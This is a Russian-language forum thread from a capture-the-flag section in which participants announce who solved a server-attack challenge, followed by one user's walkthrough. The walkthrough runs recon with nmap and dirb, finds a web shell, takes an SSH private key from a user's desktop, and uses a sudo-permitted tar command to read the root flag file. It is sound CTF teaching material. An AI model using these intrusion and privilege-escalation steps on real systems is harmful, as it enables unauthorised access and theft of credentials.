ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Задания/Квесты/CTF/Конкурсы (https://forum.antichat.xyz/forumdisplay.php?f=112)
-   -   Атака на сервер (https://forum.antichat.xyz/showthread.php?t=1624263)

sudo 31.07.2018 16:13
У нас есть первая кровь)
Первым добрался до флагов пользователь @sudo

Tayrus 31.07.2018 19:11
Второй пользователь собравший флаги @Tayrus
Третий кто овладел сервером @GoodSmile

sudo 01.08.2018 00:42
По просьбе создателя пишу прохождение. Давайте сделаем это быстро!
1. Нам дан адрес сервера закодированный в Base64. Переводим его в привычный вид командой в терминале

Код:


Код:
echo "MzcuMTQwLjE5Ny4yMDA=" | base64 -d
На выходе получаем ip

Код:


Код:
37.140.197.200
2. Запускаем nmap и смотрим результаты
На 80 порту крутится вебсервер, классика. Открываем в браузере.
3. Ничего необычного, запускаем dirb.

Код:


Код:
dirb http://37.140.197.200
Видим интересную директорию

Код:


Код:
http://37.140.197.200/term/
Переходим и обнаруживаем вебшелл
4. После недолгих хождений в директории /home/manager/Desktop был обнаружен приватный ключ rsa используемый для подключения по протоколу ssh
5. Подключаемся и получаем шелл юзера manager
6. Получаем 1-ый флаг
7. Выполним команду
Код:
id
Код:


Код:
uid=1000(manager) gid=1000(manager) groups=27(sudo)
Наш пользователь входит в группу sudo, запомним это!
8. Напишем в терминале
Код:
sudo -l
Ага, мы можем использовать архиватор tar от имени рута чтобы получить флаг (не зная при этом пароль последнего).
9. Выполняем:

Код:


Код:
sudo tar cf flag.tar /root/root.txt
tar xvf flag.tar
10. Получаем 2-ой флаг

Благодарю @HtOnion за интересное задание, мне было очень интересно разобраться с ним.

Kaotina 06.08.2018 14:04
thx for dirb @sudo


Время: 16:19